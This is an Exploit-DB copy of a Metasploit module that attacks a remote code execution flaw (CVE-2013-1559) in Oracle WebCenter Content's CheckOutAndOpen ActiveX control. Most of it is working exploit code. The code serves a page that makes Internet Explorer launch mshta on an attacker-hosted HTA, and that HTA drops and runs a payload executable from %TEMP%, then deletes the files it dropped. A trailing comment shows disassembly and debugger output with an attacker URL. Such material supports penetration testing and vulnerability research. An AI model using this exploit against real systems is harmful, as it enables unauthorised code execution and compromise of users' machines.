Oracle WebCenter Content - 'CheckOutAndOpen.dll' ActiveX Remote Code Execution (Metasploit)

EDB-ID:

25979




Platform:

Windows

Date:

2013-06-05


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",
      'Description'    => %q{
          This modules exploits a vulnerability found in the Oracle WebCenter Content
        CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where
        user controlled input is used to call ShellExecuteExW(). This module abuses the
        control to execute an arbitrary HTA from a remote location. This module has been
        tested successfully with the CheckOutAndOpenControl ActiveX installed with Oracle
        WebCenter Content 11.1.1.6.0.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1559' ],
          [ 'OSVDB', '92386' ],
          [ 'BID', '59122' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-094/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 2048,
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f -k'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 16 2013",
      'DefaultTarget'  => 0))
  end

  def exploit
    @var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
    @dropped_files = [
      @var_exename
    ]
    super
  end

  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
    end

    @dropped_files.delete_if do |file|
      win_file = file.gsub("/", "\\\\")
      if session.type == "meterpreter"
        begin
          wintemp = session.fs.file.expand_path("%TEMP%")
          win_file = "#{wintemp}\\#{win_file}"
          session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
          session.fs.file.rm(win_file)
          print_good("Deleted #{file}")
          true
        rescue ::Rex::Post::Meterpreter::RequestError
          print_error("Failed to delete #{win_file}")
          false
        end

      end
    end
  end

  def build_hta(cli)
    var_shellobj    = rand_text_alpha(rand(5)+5);
    var_fsobj    = rand_text_alpha(rand(5)+5);
    var_fsobj_file    = rand_text_alpha(rand(5)+5);
    var_vbsname    = rand_text_alpha(rand(5)+5);
    var_writedir    = rand_text_alpha(rand(5)+5);

    var_origLoc    = rand_text_alpha(rand(5)+5);
    var_byteArray    = rand_text_alpha(rand(5)+5);
    var_writestream    = rand_text_alpha(rand(5)+5);
    var_strmConv    = rand_text_alpha(rand(5)+5);

    p = regenerate_payload(cli);
    exe = generate_payload_exe({ :code => p.encoded })

    # Doing in this way to bypass the ADODB.Stream restrictions on JS,
    # even when executing it as an "HTA" application
    # The encoding code has been stolen from ie_unsafe_scripting.rb
    print_status("Encoding payload into vbs/javascript/hta...");

    # Build the content that will end up in the .vbs file
    vbs_content  = Rex::Text.to_hex(%Q|
Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
    # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
    # for conversion with ADODB.Stream
    vbs_ary = []
    # The output of this loop needs to be as small as possible since it
    # gets repeated for every byte of the executable, ballooning it by a
    # factor of about 80k (the current size of the exe template).  In its
    # current form, it's down to about 4MB on the wire
    exe.each_byte do |b|
      vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
    end
    vbs_content << vbs_ary.join("")

    # Continue with the rest of the vbs file;
    # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
    # Then use ADODB.Stream again to write the binary to file.
    #print_status("Finishing vbs...");
    vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
                    #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"

Set #{var_strmConv} = CreateObject("ADODB.Stream")

#{var_strmConv}.Type = 2
#{var_strmConv}.Charset = "x-ansi"
#{var_strmConv}.Open
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2

SetLocale(#{var_origLoc})|)

    hta = <<-EOS
      <script>
      var #{var_shellobj} = new ActiveXObject("WScript.Shell");
      var #{var_fsobj}    = new ActiveXObject("Scripting.FileSystemObject");
      var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
      var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);

      #{var_fsobj_file}.Write(unescape("#{vbs_content}"));
      #{var_fsobj_file}.Close();

      #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
      #{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
      #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
      window.close();
      </script>
    EOS

    return hta
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']

    if agent !~ /MSIE \d/
      print_error("Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    print_status("Request received for #{request.uri}");

    if request.uri =~ /\.hta$/
      hta = build_hta(cli)
      print_status("Sending HTA application")
      send_response(cli, hta, {'Content-Type'=>'application/hta'})
      return
    end

    uri  = "#{get_uri}#{rand_text_alpha(rand(3) + 3)}.hta"

    html = <<-EOS
    <html>
    <body>
    <object id="target" width="100%" height="100%" classid="clsid:A200D7A4-CA91-4165-9885-AB618A39B3F0"></object>
    <script>
      target.openWebdav("#{uri}");
    </script>
    </body>
    </html>
    EOS

    print_status("Sending HTML")
    send_response(cli, html, {'Content-Type'=>'text/html'})

  end

end

=begin

* The vulnerable control tries to solve how to open the provided extension

.text:100099FC                 lea     eax, [ebp+830h+Src]
.text:10009A02                 push    eax             ; lpResult
.text:10009A03                 lea     eax, [ebp+830h+Directory]
.text:10009A06                 push    eax             ; lpDirectory
.text:10009A07                 lea     eax, [ebp+830h+PathName]
.text:10009A0D                 push    eax             ; lpFile
.text:10009A0E                 call    ds:FindExecutableW ; This function returns the executable associated with the specified file for the default verb

* If succeeds, the provided user data is used as argument:

.text:10009D8F                 lea     eax, [ebp+psz]
.text:10009D95                 mov     [ebp+pExecInfo.lpFile], eax
.text:10009D9B                 mov     eax, [ebp+var_238]
.text:10009DA1                 mov     [ebp+pExecInfo.cbSize], 3Ch
.text:10009DAB                 mov     [ebp+pExecInfo.fMask], 2000000h
.text:10009DB5                 mov     [ebp+pExecInfo.hwnd], ebx
.text:10009DBB                 mov     [ebp+pExecInfo.lpVerb], offset aOpen ; "open"
.text:10009DC5                 jnb     short loc_10009DCD
.text:10009DC7                 lea     eax, [ebp+var_238]
.text:10009DCD
.text:10009DCD loc_10009DCD:                           ; CODE XREF: make_ShellExecute_sub_10009ACC+2F9j
.text:10009DCD                 mov     [ebp+pExecInfo.lpParameters], eax
.text:10009DD3                 lea     eax, [ebp+pExecInfo]
.text:10009DD9                 push    eax             ; pExecInfo
.text:10009DDA                 mov     [ebp+pExecInfo.lpDirectory], ebx
.text:10009DE0                 mov     [ebp+pExecInfo.nShow], 0Ah
.text:10009DEA                 call    ds:ShellExecuteExW

* On the debugger:

Breakpoint 1 hit
eax=0201ef6c ebx=00000000 ecx=00000000 edx=03850608 esi=00000008 edi=00000000
eip=10009dea esp=0201ee08 ebp=0201f200 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
CheckOutAndOpen!DllUnregisterServer+0x7108:
10009dea ff156cd20210    call    dword ptr [CheckOutAndOpen!DllUnregisterServer+0x2a58a (1002d26c)] ds:0023:1002d26c={SHELL32!ShellExecuteExW (7ca02f03)}
0:007> dd esp
0201ee08  0201ef6c <== pExecInfo
0:007> dd 0201ef6c
0201ef6c  0000003c 02000000 00000000 10031468
0201ef7c  0201efe0 03854688
0:007> du 0201efe0
0201efe0  "C:\WINDOWS\system32\mshta.exe"
0:007> du 03854688
03854688  ""http://192.168.172.1:8080/xKRTv"
038546c8  "m0mqpAt7sEYdVq.hta""

This code allows to launch other executables with user data provided as argument, but at the moment I like the HTA
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
=end